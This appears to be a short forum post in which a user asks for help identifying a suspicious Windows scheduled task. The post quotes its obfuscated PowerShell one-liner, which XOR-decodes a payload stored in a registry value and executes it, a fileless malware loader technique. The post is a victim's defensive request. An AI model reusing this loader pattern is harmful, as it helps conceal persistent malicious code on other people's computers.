Help to identify suspicious task "jojLNs"

  • Thread starter Thread starter ErichBrutus
  • Start date Start date
E

ErichBrutus

I had a somewhat suspicious task scheduled called "jojLNs" for some reason, it was tasked to run a powershell script in System32, the contents of which look something like this: $BeGAuVtuCJ=[ScriptBlock];$nXopPKHXZuvg=[string];$RFmkrqWtsy=[char]; icm ($BeGAuVtuCJ::Create($nXopPKHXZuvg::Join('', ((gp 'HKLM:\SOFTWARE\DefaultUserEnvironment03ZVQpAT').'6YoArxq' | % { ($_ -bxor (27+16+8+74+21+21+3+0+0+2+3+1)) -as $RFmkrqWtsy }))))Can anyone please tell what it was doing and was it harmful in any way?

Continue reading...
 

Similar threads

J
Replies
0
Views
11
Jatinder Singh Ss
J
D
Replies
0
Views
11
Danial Hussain
D
S
Replies
0
Views
25
swvajanyatek
S
Back
Top